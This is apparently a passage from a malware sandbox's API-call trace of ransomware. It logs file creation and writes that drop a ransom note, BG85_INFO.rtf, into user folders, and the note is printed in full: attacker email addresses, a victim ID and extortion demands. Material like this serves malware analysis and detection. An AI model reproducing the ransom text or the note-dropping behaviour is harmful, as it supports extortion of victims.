\\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x25ad0d8, cbMultiByte=7247, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\np¿WD÷\x0fe^`Ì!II\x05\x8aUá³\x81Í|\x86e\x12 cG®n&lhkô\x09mË\x05\x9fös)$\x0bsã\x9d\x7fÉ\rý)sdÁ\x1bs0\x19­­Ê4ñAmÈ\x9b/Á\x86¶ó\x92\r\x7fËõ\x1aH\x985Z¾»}\"}Î4\x0e<,\\\x92 Ü3h¬bÖ|ÕÜ\x04õw\x16Æ\x87>²§Û3ÿPH\x03û¥g·nïß\x04¯Â#5c\x03ay\x0c$ç¨\x17ïWæ¼Ñù\x021+Ùv\x05ÌW.#\x8cJÈ\x99Ú°", lpUsedDefaultChar=0x0) returned 7247 [0078.577] WriteFile (in: hFile=0x1dc, lpBuffer=0x25ad0d8*, nNumberOfBytesToWrite=0x1c4f, lpNumberOfBytesWritten=0x395fdbc, lpOverlapped=0x0 | out: lpBuffer=0x25ad0d8*, lpNumberOfBytesWritten=0x395fdbc*=0x1c4f, lpOverlapped=0x0) returned 1 [0078.578] CloseHandle (hObject=0x1dc) returned 1 [0078.578] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\BG85_INFO.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\bg85_info.rtf")) returned 0x2020 [0078.579] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lS gbMc\\BG85_INFO.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ls gbmc\\bg85_info.rtf")) returned 0x20 [0078.579] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\5KV2W3L69- l7u9zN7\\BG85_INFO.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\5kv2w3l69- l7u9zn7\\bg85_info.rtf")) returned 0xffffffff [0078.579] GetLastError () returned 0x2 [0078.579] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\5KV2W3L69- l7u9zN7\\BG85_INFO.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\5kv2w3l69- l7u9zn7\\bg85_info.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0078.580] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0078.580] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd 